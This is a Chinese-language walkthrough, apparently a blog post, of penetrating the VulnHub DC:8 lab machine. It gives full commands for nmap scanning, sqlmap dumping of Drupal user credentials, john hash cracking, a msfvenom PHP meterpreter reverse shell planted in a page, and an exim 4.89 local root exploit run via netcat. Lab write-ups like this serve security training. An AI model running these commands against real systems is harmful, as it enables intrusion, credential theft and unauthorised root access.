vulnhub-DC:8靶機滲透記錄

準備工做

在vulnhub官網下載DC:8靶機DC: 8 ~ VulnHub

導入到vmware，設置成NAT模式

打開kali準備進行滲透（ip：192.168.200.6）

 

信息收集

 利用nmap進行ip端口探測

nmap -sS 192.168.200.6/24 

探測到ip爲192.168.200.22的靶機，開放了80端口和22端口

再用nmap對全部端口進行探測，確保沒有別的遺漏信息　　

nmap -sV -p- 192.168.200.22  

 打開80端口查看，又是熟悉的界面Drupal 框架，但此次是Drupal7

 dirsearch掃目錄發現了xmlrpc.php和後臺登錄頁面

觀察了一下頁面，發現有傳參，判斷可能存在注入，下面進行測試

 

SQL注入

通過測試發現存在sql注入

 利用sqlmap進行攻擊，爆出數據庫d7db

sqlmap -u "http://192.168.200.22/?nid=1" --dbs 

 再找到users表

sqlmap -u "http://192.168.200.22/?nid=1" -D d7db --tables

 接着爆列名

sqlmap -u "http://192.168.200.22/?nid=1" -D d7db -T 'users' --columns

最後爆數據

sqlmap -u "http://192.168.200.22/?nid=1" -D d7db -T 'users' -C uid,name,pass --dump

 

 

 拿到帳號和加密事後的密碼，看樣子像以前DC3的那種加密，用john來爆

 

john解密

先將密碼保存下來以後進行爆破，可是隻爆到了一個密碼

 登錄了一下發現不是admin的密碼，john登錄進去了

在後臺發現，能夠增長頁面，也能夠編輯頁面，和dc7的狀況差很少

可是增長的頁面不能選擇以php代碼執行，找了一會發現 編輯contact us頁面能夠以php代碼執行

 試了一下phpinfo();發現沒有顯示，可能只是沒有回顯，但代碼已經保存了。接下來我利用msf進行後門監聽

 

msf後門利用

首先先用msfvenom生成後門，而後用後門的代碼複製到編輯頁面

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.200.6 LPORT=4444 R > test.php　

 

接着打開msf，輸入命令進行監聽

use exploit/multi/handler //使用handler模塊

set PAYLOAD php/meterpreter/reverse_tcp   //設置payload

set LHOST 192.168.200.6   //監聽
 run

而後返回contact us界面，隨便輸入點東西提交，就返回shell到kali了

 

 

權限提高

拿到webshell以後進行提權

先獲取交互式shell

python -c'import pty;pty.spawn("/bin/bash")'

進行簡單的信息收集

find / -perm -u=s -type f 2>/dev/null

 

還使用了linux-exploit-suggester-master腳本去跑漏洞，沒有發現什麼可利用的權限提高漏洞，看了wp才注意到exim4這個東西

exim是一款在Unix系統上使用的郵件服務，exim4在使用時具備root權限。查找一下關於exim4的漏洞，首先看看版本

 exim 4.89

找到了對應版本的本地提權利用腳本　

完整路徑是：/usr/share/exploitdb/exploits/+path中的腳本路徑　

 

 看了下文件有兩種提權方法，一個是setuid 一個是netcat

在meterpreter會話中將這個文件上傳到靶機上

upload /usr/share/exploitdb/exploits/linux/local/46996.sh /tmp/shell.sh

　給腳本文件添加執行權限

chmod +x shell.sh

 但不管執行什麼都報錯，查了一下是文件格式致使的。要想執行46996.sh文件，須要修改文件format爲unix格式

在kali用vi打開腳本修改格式   輸入 :set ff=unix，而後再從新上傳腳本

使用了第一種方法提權失敗-m setuid

第二種方法-m netcat成功，可是很不穩定，過了一會又變成www-data

 

 能夠趁root權限的時候用nc反彈shell維持穩定

進入root過關